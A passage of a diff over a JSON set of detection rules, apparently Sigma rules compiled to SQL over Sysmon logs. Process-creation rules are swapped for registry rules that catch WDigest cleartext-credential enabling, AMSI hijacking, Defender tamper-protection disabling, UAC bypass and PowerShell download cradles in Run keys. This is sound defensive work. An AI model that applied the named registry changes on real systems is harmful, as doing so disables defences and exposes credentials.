Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Use of Setres.exe", - "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", - "status": "experimental", - "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", - "author": "@gott_cyber", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "status": "test", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", "tags": [ + "attack.persistence", + "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of Setres" + "New printer port install on host" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\setres.exe' ESCAPE '\\' AND Image LIKE '%\\\\choice' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_setres.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "Suspicious Office Token Search Via CLI", - "id": "6d3a3952-6530-44a3-8554-cf17c116c615", - "status": "experimental", - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Session Manager Autorun Keys Modification", + "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "proc_creation_win_susp_office_token_search.yml" + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" }, { - "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", - "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "title": "CurrentControlSet Autorun Keys Modification", + "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", "status": "experimental", - "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate piping of the password to anydesk", - "Some FP could occur with similar tools that uses the same command line '--set-password'" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE '%.exe --set-password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR Details LIKE 'CutePDF Writer' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND Details = 'VNCpm.dll')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" + "filename": "registry_set_asep_reg_keys_modification_currentcontrolset.yml" }, { - "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", - "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate usage of appcmd to add new URL rewrite rules" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Disable Exploit Guard Network Protection on Windows Defender", + "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "status": "experimental", + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1562.001" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND Details = 'DWORD (00000001)')" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", - "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Disable Tamper Protection on Windows Defender", + "id": "93d298a1-d28f-47f1-a468-d971e7796679", + "status": "experimental", + "description": "Detects disabling Windows Defender Tamper Protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR Image LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" }, { - "title": "Fake Instance Of Hxtsr.exe", - "id": "4e762605-34a8-406d-b72e-c1a089313320", + "title": "Suspicious Service Installed", + "id": "f2485272-a156-4773-82d7-1d178bc4905b", "status": "test", - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\n", - "author": "Sreeman", + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\') AND Details LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hxtsr_masquerading.yml" + "filename": "registry_set_susp_service_installed.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", - "id": "435e10e4-992a-4281-96f3-38b11106adde", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Renamed FTP.EXE Execution", - "id": "277a4393-446c-449a-b0ed-7fdc7795244c", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", "status": "test", - "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", - "author": "Victor Sergeev, oscd.community", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059", "attack.defense_evasion", - "attack.t1202" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'ftp.exe' AND NOT (Image LIKE '%\\\\ftp.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_renamed_ftp.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Firewall Rule Deleted Via Netsh.EXE", - "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", - "author": "frack113", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((Image = '') OR (Image = '')))" ], - "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "WSF/JSE/JS/VBA/VBE File Execution", - "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", - "status": "test", - "description": "Detects suspicious file execution by wscript and cscript", - "author": "Michael Haag", + "title": "Suspicious Powershell In Registry Run Keys", + "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "status": "experimental", + "description": "Detects potential PowerShell commands or code within registry run keys", + "author": "frack113, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + "Legitimate admin or third party scripts. Baseline according to your environment" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh %' ESCAPE '\\' OR Details LIKE '%FromBase64String%' ESCAPE '\\' OR Details LIKE '%.DownloadFile(%' ESCAPE '\\' OR Details LIKE '%.DownloadString(%' ESCAPE '\\' OR Details LIKE '% -w hidden %' ESCAPE '\\' OR Details LIKE '% -w 1 %' ESCAPE '\\' OR Details LIKE '%-windowstyle hidden%' ESCAPE '\\' OR Details LIKE '%-window hidden%' ESCAPE '\\' OR Details LIKE '% -nop %' ESCAPE '\\' OR Details LIKE '% -encodedcommand %' ESCAPE '\\' OR Details LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR Details LIKE '%Invoke-Expression%' ESCAPE '\\' OR Details LIKE '%IEX (%' ESCAPE '\\' OR Details LIKE '%Invoke-Command%' ESCAPE '\\' OR Details LIKE '%ICM -%' ESCAPE '\\' OR Details LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR Details LIKE '%IWR %' ESCAPE '\\' OR Details LIKE '% -noni %' ESCAPE '\\' OR Details LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_script_execution.yml" + "filename": "registry_set_powershell_in_run_keys.yml" }, { - "title": "Suspicious Sigverif Execution", - "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "title": "New Root or CA or AuthRoot Certificate to Store", + "id": "d223b46b-5621-4037-88fe-fda32eead684", "status": "experimental", - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sigverif.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_lolbin_sigverif.yml" + "filename": "registry_set_install_root_or_ca_certificat.yml" }, { - "title": "Potential PowerShell Downgrade Attack", - "id": "b3512211-c67e-4707-bedc-66efc7848863", - "status": "test", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Harish Segar (rule)", + "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", + "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", + "status": "experimental", + "description": 